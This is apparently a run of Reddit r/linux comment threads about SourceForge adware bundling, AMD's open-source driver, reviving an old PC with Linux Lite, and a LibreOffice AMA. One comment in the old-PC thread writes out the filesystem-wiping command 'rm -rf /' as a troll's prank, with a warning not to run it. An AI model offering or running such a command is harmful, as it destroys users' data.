That is pretty dirty,  but why did they leave the account open if they abandoned source forge?  Personally I prefer source tarballs that can be checksummed instead of huge code repos,  unless i'm contributing to that project in particular...
I expect it doesn't, but does the GPL affect this? Does bundling adware with GIMP-WIN mean that the source for the adware must be released? I'm guessing bundling does not come under derivative works, but I am no lawyer nor expert in this area.
I never understand why people continue to use SourceForge.. They have no respect for their users, the service is bad (when it's working at all), and they pull shit like this. 

Go to BitBucket or Github or something.. Just stop using them.
They did this a good while back to a few other projects. Specifically remember FileZilla falling prey to this.

They're just another CNET download.com
9x report 
I had no idea that SF does things like this. That is messed up. Is it possible in GPL software to modify the license to restrict ad/installer-bundling like this?
Are you absolutely positive SourceForge is responsible for the breach and not simply a malicious hacker using the SF name?

Scammers do tend to take up screennames with authority associated with them.
Also, you can not delete project from sf.net, so hijacking projects is becoming easy and profitable. Sf.net is real greedy traitor in a open-source world. Never again. 

Actually the list of the projects include, but not limited to: «Alien Arena, Apache HTTP Server, OpenOffice, Audacious, Audacity, Banshee.fm, Brasero, ChatZilla, Dingoo Linux, Epiphany, Evince, Evolution, Fedora, Firefox, FreeOTFE, GPG, Gnumeric, Inno Setup, LLVM, LibreOffice, MAME, Mono, Nmap, Qt Creator, SeaMonkey, Thunderbird, Transmission, VirtualBox, WordPress, Xonotic и openvz.»

I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/thegimp] [Please folks, download GIMP from gimp.org.](https://np.reddit.com/r/theGIMP/comments/39jgvi/please_folks_download_gimp_from_gimporg/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger/wiki/) ^/ ^[Contact](/message/compose/?to=\/r\/TotesMessenger))*

[](#bot)
I have a question regarding the repositories of Linux distributions : 
Do they depend on Sourceforge or are they maintained by the people who are in charge of the quality control ?
I am concerned because Vim seems to be hosted on Sourceforge and you can only get Dia by going to Sourceforge :(
No ethics, eh? Real fucking classy on SourceForge's part.
Why download things from websites anyway? Just use `apt-get` or `yum` or something. 
WTF, who uses SourceForge anymore and/or allows that kind of chicanery in binaries of their OSS work?
What happened is not really verified, right? Why already start the hate? Maybe someone hacked into SF? Maybe it was from SF but an employee has misunderstood something? As far as I know we don't know exactly what happened, so let's keep a calm head for now.
This is GNU liscense infringement and they could face civil action from the creators.
What does this have to do with Linux? Only the Windows version of GIMP has this problem. 
click b8 title, that acct has been inactive for years
I recently bought my new AMD graphics card purely for the fact that you have an open source driver. 

Which is amazing. 

Keep up the great work devs. You will continually get me telling everyone about your open source driver is amazing. 

~~(Also if you could release your Radeon Software as open source as well, that would be awesome. Or just as a tar.gz file without and of the deb/rhel info for those of us with different/alternative distros)~~ apparently this relys on window specific things, but can be all extracted from the Deb's and then run, thanks for all the info everyone!
[deleted]
And shame to Nvidia for causing a lot of headache to its Linux users.
A BIG thumbs up! Those devs get little love from either side. AMD squeezes them on funding and tries to force them to reuse code from the Windows drivers. The Linux powers try to force them (by not accepting wrapped Windows drivers) to provide Linux-specific code that does things the "Linux way". The amdgpu devs are caught between a rock and a hard place, but they continue to try to improve their Linux drivers.
>(Also if you could release your Radeon Software as open source as well, that would be awesome. Or just as a tar.gz file without and of the deb/rhel info for those of us with different/alternative distros)

Radeon Software is just the control panel GUI - it depends on a lot of code in Windows and in the Windows GPU drivers. Until we get that lower level functionality into the Linux driver (which is happening bit-by-bit) there isn't much benefit to be had from porting Radeon Software to Linux, whether open or closed.
I think it's been long enough to bring this back out once more:

https://www.youtube.com/watch?v=4TMVTsci_ME

Thanks for all the hard work, /u/BridgmanAMD! (and all other AMD graphics devs \^.\^)

We really appreciate having a good open-source driver. :)
I think AMD just release proprietary vulkan driver as opensource. AMDVLK I think.
For those of you with alternative distros, you can simply unpack the deb/rpm packages, or convert them to tgz files and go from there.
AMD is really nailing it right now, with just a few missteps. On the other hand Intel and Nvidia need to get their shit together, too many security flaws and shit driver support is unbearable.
[deleted]
It is the reason i bought a Vega64 rather than a GTX1080.
+1, just bought an RX560 and it plays CS:GO and Dota 2 on Linux wonderfully in 1440p.
Absolutely, this driver rocks. ;)


I'm using an older Radeon 290x with Mesa (Hawaii) and it absolutely rocks, it's fast and everything just works now. Including Steam games that used to require proprietary drivers like Dead Island.
This: next rig will be an AMD one without a doubt.
I agree with AMD's stance on open source, but please note that AMD is not a charity. Buy AMD because they're better, not because you feel bad for them.
Say, how good is the video driver for the Ryzen 5 2400G? Is it usable?
Hear, hear. Planning a switch over to Linux in the near future and one of the first steps is going to be swapping my 4GB 960 for either a 480 or 380 -- I'm fine with sidegrading but the 480 would be a nice bonus since I'm buying a GPU anyway. Going to sell the 960 to recoup some costs, but going with AMDGPU will save me a headache or five.
I did the same thing you did, OP. NVidia used to have terrible Linux drivers then they started to also have terrible Windows drivers. Switched to AMD and haven't had problems since.
do you mind if I ask what GPU you're using?
Just sold my 970. Next month 580 is arriving! haha
[deleted]
Thanks guys... This gives me hope... I was planning on building a pure AMD system after all the spectre and meltdown debacle.. How about linux on ryzen (given I always run a latest stable kernel)
Go Team red!
Does anyone have a HOWTO to convert from AMDGPU-PRO?
It almost makes up for the decade of utter garbage closed source drivers they used to put out. Still get PTSD over them. 
>I recently bought my new AMD graphics card purely for the fact that you have an open source driver. Which is amazing. Keep up the great work devs. You will continually get me telling everyone about your open source driver is amazing.

I forgot to say "thank you" :)
How is it "open source" if it requires a non-free firmware binary blob to work?
Despite being Open Source, it is not Free Software. If you want a 100&#37; free distro, you can't have these drivers and you're stuck at a 1280x1024 resolution.
same here. 
I wish I could get my R9 290 to work with it. I tried the guide on the arch wiki but it didn't work for me. If anyone managed to get amdgpu to work with a 290 let me know what black magic you casted.
I got an AMD build before amdgpu was out there, just for the fact that AMD does a great job. I got confirmed when amdgpu was released. The graphic speed was so-so before, but got really good with amdgpu and today I'm completely fine with what I get put the card. 

And I am no heavy-graphic guy, just a normal desktop user in that regard (but with three displays).
Yah it rules.
I wish AMD would hire a couple of people to help developers with OpenCL questions in forums too.
I am a proud owner of a r9 285 and today I have compiled the 4.17.2 mainline linux kernel. An year and a half since I have bought a free sync display, I could finally experience it fully!  Thanks AMD. Next on my checklist is ROCm!
Thank you amd dev teams helping innovation and technology 
Welcome
Unfortunately im tied to nvidia cause of cuda... I which i could use amd on linux
Needed a PC for work, usually I'd use my laptop but me and my wife have been having to share since COVID has her taking classes online. On days where she'd have tests and I had to take my computer to work someone would always lose. We were looking into getting another laptop or desktop that we really can't afford right now.

So instead I dug out an old HP Pavillion P2 running windows 7 from the basement and booted it up and it ran with the speed of 1,000 dead snails. I decided to install Linux Lite to bring some new life to the old thing and it's like I have a brand new PC (from 2010, but brand new!). I really can't believe the difference.

I am really not knowledgeable when it comes to tech so this was an awesome find for me, very easy to install and works great.

Edit: Some great advice in this thread. Thanks guys. I half expected to be made fun of and downvoted. Great community!
Check out /r/linux4noobs if you need any help. Also adding an SSD to even an old pc will make a huge difference in performance.
$1,000 might be exagerating a bit, you can get perfectly useable laptops (for everyday stuff like browsing the internet) for under $300 here (especially if you buy refurbished). You could maybe even get away with a raspberry pi that costs under $100.

Nevertheless though it's great that you didn't have to spend anything.
[deleted]
Linux turns trash into trashCAN. Not trash cannot.
Hardware degrades little over time. Windows on the other hand...well, let me put it this way: they now have an option to just download and reinstall the OS from scratch in the control panel.
You should've aimed for $1,500 replacement, this way you would've saved $1,500. After 20 years of using Linux I saved more than $30,000!
Sometimes I wonder if it's all magic...
Linux saved my laptop too. Spilled some tea on laptop and fried its dedicated graphics. Windows wouldn't boot, gave blue screen. Couldn't make windows not try to turn on the discrete gpu. But Linux had no issues at all ignoring the discrete gpu
Although a fresh install of Linux is more lightweight than a fresh install of windows, you would probably have a smooth running system with a fresh windows too.
A big annoyance with windows is that it keeps growing itself overtime (it keeps a lot of old crap for if you or itself fucks up).
The school my wife works at was getting rid of some old computer hardware. I grabbed a 10 year old iMac and upgraded the RAM to 8 gigs. I installed Ubuntu on it and I am going to give it to my buddy for his kids to use. Linux is fantastic.

I would install an SSD for him but iMacs are so stinking messy to get into.
I have a 16 core 64gb ram that I work on, I only  use Ubuntu, boy it runs fast.
Welcome to the linux community! I love your story and if you ever need help let us know!
[deleted]
Yeah Linux make miracles
linux has saved countless lives of older computers ... priceless
Awesome! Linux runs beautifully on old hardware, but only up to a point. I have a old computer of that era that still is entirely usable, but the RAM is maxed out and I added an SSD to it. With the computer prior to this one it became unusable once Firefox started requiring newer CPU instruction sets that it didn't have. Although it was pretty damn slow to operate at that point anyways.
To further save resources look into WMs like fluxbox. Honestly I've loved how customizable it is and it's insanely light weight. After i got my first apartment I'd dumpster dive computer parts from MIT and put good ol Slackware on it and totally rejuvenate these shit builds with lightweight everything. After a bit of tinkering I could run newer games (well, new then) like Condemned: Criminal Origins! The linux community is very strong these days with minimal bullshit. You have no idea how many routine questions would end in some asshole going OH YEAH YEAH THE COMMAND FOR THAT IS rm -rf / (DO NOT DO THAT BTW. or do it. You'll remember how bad it is to delete your own hard drive after that for sure). Either way, enjoy and learn how to use package managers! Leave the make, make config stuff for when you're advanced. Learning how to uncompress is also a big help from command line (i like tar -zxvf for normal tarballs, verbose is your best friend). Get your command line skills up and everything else in linux is total cake. Get the hard stuff out of the way first

Good luck!

Shit, also learn how to use windows emulators such as wine for programs there's no linux equivalent for or just for games. Xwine i believe is the one they use for that, i just keep my install on a lappy and my windows on the desktop for gaming and music production so its been awhile since I've used it. Everyone's gonna tell you to buy this and buy that - fuck em. Use your old hardware, get badass with linux or at least good enough to know what you need AND THEN spend money. If I listened to everyone when I started toying with linux I'd have a sparc workstation that'd be worth fuck all now
Sometimes the first step on the path to "free as in freedom" is "free as in beer." It's nice to see free and open source software helping people in matters of finance as well as matters of liberty.
If you get some spare cash and are looking for a new laptop get one from eBay, Tons of them available that are old business laptops that have had their HDD wiped I got one for £250 they specs are perfectly readable only a few years out of date. I stuck xubuntu on it runs like a dream.
"the speed of 1,000 dead snails"  


LMFAO
While they aren't the lightest distros, I have Linux Mint on an original HP TX1000 and A DV9000 and I run KDE on any hardware that's dual core and has 4GB of ram plus. The TX1000 runs better with Mint than it did with Vista and 7 and the DV 9000 feels like a modern computer. It's really kinda silly.
Hey, your post was just used on DistroTube. You're now among the Elite! :)
`It is still unstable if it has an nvidia graphics card.`
Well, i wiped osx from a mac book and instaled Debian. It just works.
Which Linux distro did you install?
Which distro did you install ?
If you end up liking Linux, you should check out [Xubuntu,](https://xubuntu.org/) it's more full-featured that Linux Lite, and it's main feature is that it is designed to run well on older, slower hardware with little RAM overhead.  It uses the same "Window Manager" that Linux Lite does (Xfce) so the layouts and ways they work should be relatively similar.
And you didn't spend at least 4 hours googling for drivers that work with your hardware for this distro? I am sceptical /s
Nice!!
Great story. I needed an updated computer and was thinking of getting a Mac. I have an old 2008 Mac Pro and installed Pop!_OS to make it feel new. Love it and saved me a lot of money.
I saved a few PCs this way. Most notable is a decade-and-a-half old Acer Aspire TravelMate that looks like it went through a fire because it's gone through a lot of 'heat treatments'. Last time I used Windows on it, it can't even run a browser tab with YouTube on it because it only has 512MB RAM (or 1GB, maybe I upgraded).

Right now it's running Ubuntu 16.04 because the bootable USB is lower than 2GB (I had a 2GB USB thumb drive from roughly the same era, unused otherwise because nowadays 16-32GB is the norm). It feels like new again!
this is where linux really shines, IMO. It doesn't handle new hardware all that well in my experience, but 4+ year old machines it fuckin purrs
Up until the spectre security updates I ran Linux Mint Cinnamon on 12+year old 2gb ram pentium dual core. Still works to some extend with xfce but can’t really deal with multiple programs, multiple browser tabs or online video all that well these days.
If you want even more value get yourself any kind of SSD that's a brand name you've heard of before. Even Adata makes good cheap SSDs.


Hard drives are for general storage. They are way too slow for a system drive.
Understand completely.  I've got a Dell Optiplex I3 sitting here ready to go to my brother.  Good stuff, cheap.  The Dell was $20 and came without a hard drive.  But I didn't need a hard drive because a good enough SSD was $20.  I was given a good monitor, keyboard, and mouse.  So the only other thing I had to buy was some cheap speakers and good to go.  It will be his first Linux machine so I'm going with Zorin Lite which kind of looks like Windows.
Hurray ! Glad it worked ! Well done ! :-)
That was my first switch to Linux too - old Laptop from 2011 (that was already bad back then) brought to life with Mint :)
That's great to hear - it's always cool when open source software can return computers back to life and of course you're saving the planet and the carbon footprint.

Re-vitalizing computers and then sending them to areas that cannot afford computers is a good thing - and allows more folks to join the internet age.

now for the cheesy part - did you also save money by switching to Geico?
Several years ago, I installed Arch on an old laptop that was gathering dust in my closet. I ran SETI@home 24/7 until it died. Good times!

On second thought, your plan is probably better.
"1000 dead snails" - is that slower than 1, or 1000x faster than one?   I love it as a unit of measure, I just want to be sure I know which way the magnitude goes.
Good for you sir/ma'am.

I have been using linux for **more than  4 years** on hardware with **less specifications** than your old system, and it suffices **all** my computer uses.
I've revived this old laptop 2 times now, first by switching to ubuntu, then by switching to arch. It's not going to be "fast" ever again (was it ever), but it boots quickly and the battery lasts longer. It's a pretty good internet/coding machine, and can run all my crappy CRPG's from steam just fine.

At some point I'll probably try to get Gentoo on it, instead of throwing it away. It's so much fun.
When you are able to buy a new computer in the future, look into [Unraid's Multi-seat options](https://unraid.net/product/multi-os-users) because you will get more performance per dollar buying one powerful PC to run two virtualised seats from than if you bought two mid-range rigs
It may also because it's overheating.
You should try to open up your case and clean out dust.

There's some air canister you can buy from Walmart,
specifically for PC.  You can also wear any plastic gloves and use brush too.
Hi everyone, we are team and board members of The Document Foundation (TDF), the non-profit entity behind LibreOffice and the Document Liberation Project, and we're joined by community members as well. It's TDF's 7th birthday today, and as we get ready for our annual conference and prepare for LibreOffice 6.0 (due early next year), we want to reach out to you, /r/linux!

What do you want to know about LibreOffice - the software and community - and The Document Foundation? Do you have any suggestions or ideas? Let us know in the comments! Of course, as LibreOffice is a FOSS project with developers scratching their own itches, we can't make grand predictions or say exactly when certain features will be implemented. Bit we'll do our best to answer :-)

Here's who we are:

* /u/italinux - Italo Vignoli, Marketing & PR
* /u/floeff - Florian Effenberger, Executive Director and a founder of TDF
* /u/htietze - Heiko Tietze, User Experience Consultant
* /u/shinnok - Teodor Mircea Ionita, Developer Mentor (can help if you want to start hacking on LibreOffice)
* /u/cloph_ - Christian Lohmaier, Release Manager
* /u/The_real_erAck/ - Eike Rathke, TDF Board member and long-time LibreOffice developer
* /u/sgauti - Sophie Gautier, Administrative Assistant and Release Coordinator
* /u/mejmeeks - Deputy Chairman of TDF Board, and long-time LibreOffice developer
* /u/xisco_libre - Xisco Fauli, QA Engineer
* /u/thebearon - QA community member
* /u/thorstenb - Thorsten Behrens, TDF Board member and long-time LibreOffice developer
* /u/themikeosguy - and me, Mike Saunders, Marketing and Community Outreach

(Oh and by the way, many of us are also active in /r/libreoffice – it's still a small community, but has doubled in size in the last year.)
Thanks to you, we have an office suite that, while not perfect, is plenty good for most users. This is great!

So, where next? Improving the suite, obviously, but beyond that? Add more components, support more OSes, cloud versions, a "simple suite" front-end for home users or what?
I have no questions. I just wanted to let you guys know that a small new manufacturing unit in India is taking its first steps and it relies on your software to manage its operations. While it may not be a massive enterprise facility, they rely on your document suite to avoid exorbitant licensing costs for Microsoft software on the couple of computers they have while still keeping daily records and drafting documents solely on your software.

We're grateful. No questions about that. It is just that I want your team to know that your software is now powering the dreams of many "creators" who are taking their first steps and who rely on your generosity to fuel their dreams. 

Keep up the good work and may god bless you all!
First of all, I would like to thank you very much for making such an amazing piece of OSS.

Second. What does it feel like, being a big part in making one of the biggest OSS projects to date? 

Lastly, how is your day ;) ?
Thanks for this AMA!

1. How many people work full-time on LibreOffice? How many of them are programmers? And who sponsors their work?
2. TDF is a German entity. Does LibreOffice have more european contributors than non-european ones? Is LibreOffice more used in Europe?
3. What are the best features in LibreOffice 6.0?
What do you think it would take for mass adoption of open document formats?

Also. Thanks for all the great work. 
Is there any plan to add a OneNote equivalent? Something that syncs styled text across devices that works during use?
[deleted]
Hello /u/floeff, I don't know if you remember me, but you (or possibly someone else from the earliest days of LibreOffice having a presence on IRC) agreed to do an interview with me for my college newspaper (Bloomsburg University's *The Voice*) shortly after the fork from OpenOffice.org was announced.

First I wanted to say thank you for not making me look like a kook! The fact that LibreOffice is still going strong and that I got to help spread the word in its infancy is one of my fondest memories from working on the paper.

Second, I wanted to ask if you think you've accomplished the major goals that you set out to achieve when LibreOffice was forked, what big challenges you think still remain, and what some of your proudest moments have been as part of developing LibreOffice over the last seven years :)

---

EDIT: After reflecting for a minute I'm fairly sure it was actually /u/mejmeeks who granted me the interview! Apologies to both of you for the memory hole!
My pet feature request: [outline mode - with a ticket since 2011](https://bugs.documentfoundation.org/show_bug.cgi?id=38093), preceded by an [Openoffice feature request from 2002](https://bz.apache.org/ooo/show_bug.cgi?id=3959). I would like to understand how such key to writing productivity ended up out of scope.

I understand that outline mode is not considered relevant to the Libreoffice project. To me, outline mode is an essential document production tool, but it seems that I have a minority opinion...

Is it such specialized feature that the development effort is not considered profitable ? Do Libreoffice users only produce short documents, for which in-band document structure management is not necessary ? Do Libreoffice users actually use outliners alongside Writer ? Have I been wrong to use Microsoft Word's outline mode for the last 25 years ?

Pretty sure that someone in this thread is going to suggest Org-mode...
Do you guys write a lot? What kind of stuff do you usually write?

Do you agree with the notion that MS Office is better than LibreOffice? In what aspects do you think LibreOffice is better and what aspects do you think MS Office is better?

By the way, thanks for LibreOffice, I really love it :)
Hi, thank you for keeping to push LibreOffice forward.

I don't use LibreOffice as I find the interface too bloated, I find Google web apps more simple and easier to use, helping me spend less time.

Have you done some research testing the difficulty level or learning curve of using LibreOffice by people who don't need to use it regularly, let's say access it once a month?

Have you ever consider having a simple GUI mode with access to fewer features?

What's more important to you, 1 to 1 compatibility with MS Office or following specifications? Are you testing for exact output as MS Office when MS fonts installed in the system?

Are you planning to add native OCR service (not external extension)?

What about handwriting?

Did anyone research how hard it would be to parse OneNote files? there is an old open specification of MS Ink Serialized Format and also an open OneNote File Format.
Will I someday be able to `apt-get install libreoffice-cloudserver` (metaphorically speaking) and have a full web-based office suite running, or is the goal simply to create a framework that other projects will build into a working product?

If the former, what do you estimate the timeline is on that?
Thank you for this amazing piece of software, I take pride in saying that I've been using LibreOffice (and OO, back in the day) for the past decade.

What is the easiest way to contribute to the software side of this project? Are there any good starting places that make hacking LibreOffice a bit less.. intimidating?

Thank you, your effort is having a real impact!
Happy birthday!

You asked for suggestions, so let me point out the obvious stuff: Microsoft Office compatibility and a better UX (I certainly find the muffin experiments interesting)

I've heard stuff about LibreOffice online, but as far as I know it's not available online hosted by you guys and not yet easily installed on ones own server, so I'm looking forward to more news on that front.

I also want to say hats off to Draw, which I've used a couple of times to edit PDFs, and keep up the good work!
What do you think it will take for governments and big businesses to adopt open source software like LibreOffice?

P.S. Keep up the good work
Given unlimited resources what would you like to achieve in LibreOffice, that you are unable to do currently?
Are there any tips for marketing an open source project? What advice or marketing strategy should other Opensource foundations follow in this regard?
Thanks so much for your great work on this office suite.  My student recently installed it and was really impressed with it.  It's been an eye-opener to him for open-source software.

My question is - what sort of floating point arithmetic is done in calc?  Is it binary/decimal?  Is it ok for finance and what sort of precision does it have?  Thanks.

My suggestion would be to get a clear, modern default icon set designed.  If you were to crowd-fund that, I'd be interested.  It doesn't need to be modern in minimalist, we can keep the floppy disc save etc etc, but at the moment it looks like 90s pixel art.
Got through my university course using your office suite. As a broke ass at the time, just wanted to say thank you, I've donated in the past and will do so again when I can.
Will Libre Office have a variation of Microsoft OneNote? My interest in OneNote has diminished but I think it may spark up interest in a proper note taking and organizing program. 
Let's say, hypothetically, that Apache were to close down OpenOffice tomorrow and would hand you the trademark. Would you do a rename? Would you just use both names? Would you cast it aside? Anything else?
[deleted]
In the first few years of the project there was a big effort on improving the core of LibreOffice, e.g. to make it more reliable and easier to maintain.

Is that work essentially done? or are the still big tasks remaining do under the hood?
[deleted]
I have only 2 things that keeps pulling me away from LibreOffice to other office suites. Obviously, I would love to see them fixed and curious if or when there are any plans. The 2 things are ;

1. Terrible options for templates in Impress. Most presentations I just want to throw something up, but I want it to look pretty. Compare Keynote or PowerPoint with Impress and you are lightyears behind. Looks like an easy fix to me to get it a lot more enjoyable. 

2. Very limited and /or poorly functional options for graphs in Calc. My main reason for using spreadsheets is to present data in a quick graph or table. It's just too much hassle in Calc to get anything presentable. 

Any word on what plans there are too progress in these two areas? 
Other people have asked about a One Note component, a mail component, etc.

What I want to know is if users should realistically expect that new major components will be added to LibreOffice at all, or if that's just not feasible/within the scope/desirable at this point?  

To put it another way, the basic lineup of Writer/Calc/Base/Impress/Draw/Math hasn't really changed since the StarOffice days, should we ever expect that it will, or is that not realistic?
Say someone wants to make an office suite with different selling points/UI thats not just a renamed LO or symbolically forked.

Are there plans to make an embeddable library of LO's core that rival office suite makers could use to benefit from LO's advancements and produce working alternatives quicker, with less technical divergence from upstream? Think of it how some apps used to run atop a Gecko/Webkit web engine.
I'm a heavy Evernote user but have been disappointed in the direction they've taken recently (I know, I should just stop free-loading and pay up). But what stops me from paying is that I have the technical ability and existing resources (read: home server) that I can install something like [paperwork](https://github.com/twostairs/paperwork) and go it on my own. But doing so would lack the integration across devices that Evernote does well.

Anyways, I think journaling capabilities are becoming an essential tool in any office application suite.

Are there plans to create a searchable journaling component to the office suite? And/or as part of your cloud efforts, do you see a journaling component similar to Evernote being possible?

Thanks.
LibreOffice Mail ?

Could that ever be a thing?
How do you evaluate the usability of your technologies? 
As a freelance translator off and on for 10 years who's also a FOSS fanatic, I'd just like to thank you guys for all the work you've done. I'd also like to note that, over the years, I've had to resort to editing files in MS Word in my virtual machine less and less frequently, although there are still some wonky formatting issues (due to Microsoft making their file formats a pain in the ass, I think).


Also, is there a way to make Writer always open documents zoomed to page width?
Are there things you are exited to share, but no one asking the right question?
Thank you all for your work on such a great and important suite.

OpenOffice is effectively worthless at this point but unfortunately it still has mindshare with the name. I think this is detrimental to the larger adoption of LibreOffice.

Do you think it's a viable option to petition Apache to drop the old (at this point irrelevant) project they revived or do you feel it would be better to keep focusing on LibreOffice itself in a competitive approach?   
In the future, will it be possible to export presentations as videos, ala PowerPoint and Keynote?
[deleted]
If you would add any new app to the suite, which would it be?
How good is your interoperability with other OSS office suites like i.e. Calligra?
Where do you see a chance for performance optimizations?
[removed]
When can I embed videos in presentations?
Thanks for your awesome work!

Would you care to provide more info on DONATIONS? For example: how we can donate, can we donate monthly, how they are used, how more donations would help you, what else apart from financial support could the community help you?

Thanks!



Has the team ever thought about adding markdown functionality to Writer? A markdown toolbar with a preview function and an export to html feature would be sweet.
Please add a language toolbar. Back in M$ Office 2003 you could add a different language toolbar. My mother speaks fluent Spanish. It was very easy for her to add the toolbar and put the cursor where she wanted to add the Spanish character and with one click of the mouse on the toolbar inserted that Spanish character. Sadly Office got rid of this feature. 

PLEASE ADD THIS FEATURE TO LIBREOFFICE!! 
deleted  ^^^^^^^^^^^^^^^^0.6984  [^^^What ^^^is ^^^this?](https://pastebin.com/FcrFs94k/52337)
I just want to chime and also express my gratitude for what you do! 
[deleted]
I can't thank you enough for this software--I started using it when I was an English major in college and I've since gotten a graduate degree in creative writing. LibreOffice never let me down!

Is there anything somebody with no coding experience can do to help LibreOffice or other FOSS projects?
What's your take on Canonical 
Why cant any spreadsheet program besides excel make Tables with sort-able headers? Did you guys get sued by M $ to be prevented from making a table, and what's it like battling/negotiating with enourmous powers such as them?
Is there anyway when using the formula function in the writer that you can format the text of the formula?I have to do dimensional analysis for my homework and can't for the life of me figure out how to do strikethrough or change the text color
Is there any documentation if I wanted to develop for LibreOffice? I once wanted to patch a silly little thing but after an hour of digging through the source code I gave up.

Images were sorted non-numerically on some list (Image 1, Image 10, Image 11, Image 2) and it would be a simple task otherwise, but I didn't even get close to finding code responsible for the dialog where it was wrong. How would one find his way in such a large codebase?
Any plans for improved spell-check in the near future?
I'm making my thesis thanks to LIbreOffice, thank you very much for your work. Greetings from France !
What does it cost to run LibreOffice, and how is the breakdown structured of funders?

Also have you considered allowing users to compose parts into documents?

Last thing. what would it take to have libreoffice headless verify a document, checking for errors returning 0 (success) or any other code you like (preferably with message) if a document is invalid?
LOVE YOUR PRODUCT! Constantly getting customers and friends to use it! Thanks for all your hard work!
We have access to historic documents that are very old, even thousands of years odl. However, documents created today are typically in Microsoft Office format and no one knows what will happen to them in a hundred years. Maybe whoever holds the patents will not even allow us to read them.

Document formats are the infrastructure of the 21st century, just as telephone standards were the infrastructure of the 20th century. When will our governments do away with proprietary document formats and institute a sane and open alternative? Why is there so little interest in this?
I heard that work on 6.0 is starting soon.  What's planned for that, that 5.4.1.2 doesn't already have?
Thanks Libreoffice for you great effort! 

My question

Do you see Libreoffice taking over the document ecosystem (replacing ms office) in the future? Or rather a symbiosis?
What made you want to create the legendary LibreOffice?
1. Did the Deepin guys contact you about including LibreOffice into their distribution? 

2. What do you think about WPS office? Their "Word" has tabs.
THANK YOU SO MUCH FOR ALL OF YOUR HARD WORK. Truly, the things you do touch the lives of millions. Such a beautiful thing to do with your time. Thank you.

Remember the whole Thunderbird leaving Mozilla thing? They were considering getting into TDF. What happened to that awesome idea?
Is there a plan on adding cloud support (e.g. directly edit Google docs in libreoffice)? Also, is there a plan for improving ui/ux? Btw, love your products, use them every day!
What is a good resource to learn the benefits / issues of using Open document format as opposed to the closed ones from ms?
Could you please comment on why LibreOffice runs SO SLOWLY compared to NeoOffice on a mac?  Even scrolling, it's like press a key and wait a few seconds.  I've adjusted all the memory settings to increase, but it feels like I should not have to make these kinds of adjustments - it should just work better!  Thanks!
What do you see as the biggest obstacles that would prevent businesses abandoning Microsoft Office software entirely?
Do you think it was a mistake for Apache to accept OpenOffice from Oracle, because it was already clear at the time they accepted it that a lot of momentum had already shifted to LibreOffice?
Hey there! I use LibreOffice every day, so I just wanted to say thanks for such a great set of tools. I've also managed to convert a bunch of members of my family who have found it to be a more than suitable alternative for Microsoft Office because they didn't want to have to pay for the subscription.

I'd love to give back in some way, but as a student large donations aren't really an option, and I'm still learning as a programmer (plus I'm really busy). Are there any low-commitment things that I can jump into and help the project in some way?
Sometimes I feel like I am the only one who uses "mail merge" in LibreOffice Writer. I use it to send out leases once a year. It has some serious flakiness. While I have been able to make it work by pure stubbornness, every time I use it I see things I wish worked better. I also wish the "report writer" type features were better implemented so I could use Writer to produce database-driven documents.

I do have some technical background (mostly as a technical writer), but not as a programmer. What's the best way for someone like me to help improve the quality of LibreOffice? 
Are there any plans to make Writer a full-featured suit for writers, like [Scrivener](https://www.literatureandlatte.com/scrivener.php) as an example?
Just wanted to say thank you for everything you do and making it possible for my dad to switch to linux.

How fast do you think will open document formats replace doc/docx?

Edit: I see you already answered my question. So instead: How would you go about telling people about open formats? How would you convince them to switch  

Edit2: What's the thing from word's file format that was hardest to implement?
Automated upgrades are my #1 request/question -- it makes me sad that when I help friends install LibreOffice, unless I periodically intervene, they'll likely be stuck on the version installed and never get the constant stream of fixes and features produced by the great LO developers. After a time, it's almost as if they were stuck on OOo. ;-)

But I see that automated upgrades are being worked on seriously and could make 6.0?
https://mmohrhard.wordpress.com/2017/08/22/announcing-automatically-updating-daily-windows-libreoffice-builds/

Hooorary! THANK YOU!
I just want to say THANKS!
Just wanted to say you're doing a great job with LibreOffice!

Thank you!
Hi, what goes on inside to convert content to **PDF**?
How do you plan to address Macros as the biggest excuse people have for not migrating to LibreOffice from MS Office? I'm an implementer and I am not sure how handle this facet.
[deleted]
How do I set line spacing to double automatically when I open LibreOffice Writer? I can't figure it out. /s

No but seriously, I want to give you all a big thanks directly for giving us all an opportunity to use a powerful office suite without forking over loads of money. I don't really have any meaningful questions, so I'm just going to leave it at that. Thanks, and keep it up!
If you enter a number with a comma into Excel, it gives you a warning and removes the commas.  Calc just gives an error - not friendly.  Hopefully that can be improved.
eg "=1,234"

In case you are wondering... why not just don't type in the comma.
This happens to me when I paste in a number from my bank.
This is more of a philosophical question. Office applications as they exist today, are still very much focused around paper workflow, either directly on real paper or on virtual paper via PDF. Do you have any plans or visions on how an Office application or a data format would look like that is focused from the ground up on an all digital workflow and digital publication? Essentially, 20 or 50 years down the road, what would you imagine an Office workflow to look like (assuming we haven't all been replaced by AI).
While LibreOffice itself is quite OK, collaboration with Microsoft users is too difficult.

My daughter uses LibreOffice/Linux and exchanges files with MSOffice-using classmates for school projects. Presentations and text documents get regularly mangled during this step. Manual reformatting is needed to make the documents look acceptable again.

I know that it is possible to have better compatibility because we bought a Softmaker Office version for Linux which does not have these issues. Conversion problems are minor and acceptable here.

Is LibreOffice working on this? Collaboration with Microsoft users seems quite important to me.
1- I don't mean to make it an inconvenient question, but I'm curious as to how your relationship with Microsoft has been this years. I'd consider you the best competition for them.  
2- What was the best comment/feedback/e-mail you ever received?
We've been trying to move our customers over to LibreOffice as an alternative to Office 2016. However the issue that users always run into is the feeling of an outdated or underperforming UI. The current implementation of the "Ribbon" that's experimental is a good start but is still quite behind. What are the current plans for UI development? Perhaps an ability to mod/skin the interface from the client side to allow focus to remain more of the core functionality and stability?
What are some of the biggest changes / fixes we can expect to see in 6.0? Thanks for all the work you guys do you are awesome!
[removed]
[removed]
OneNote alternative? When? ;)
As a college student, the proprietary software I'm forced to use the most is now Google Docs, not MS Office. Is a hosted online collaborative office suite in LibreOffice's plan for the future?

And thanks for developing LibreOffice, its fantastic :-)
Can we get vim support?
My question is...

How's all of you guys' day? Hopefully good :)
First of all, Thank you for LibreOffice. An awesome piece of software which is underappreciated.

My question is around the future of the Spreadsheet (LibreCalc) and to see if there is any interest in adding any of the features below:

* Data analytics functions such as those in PowerBI

* Support for leveraging macros written in Python (e.g xlwings) 

* I would like to see more on using Python to interact directly with data stored in Base. Today I use SQLite for most of my projects, but would prefer not to spend so much time trying to get LibreCalc to talk to SQLite.

Thank you again for all your work.

Do you have any plans to improve the Ribbon UI clone? 
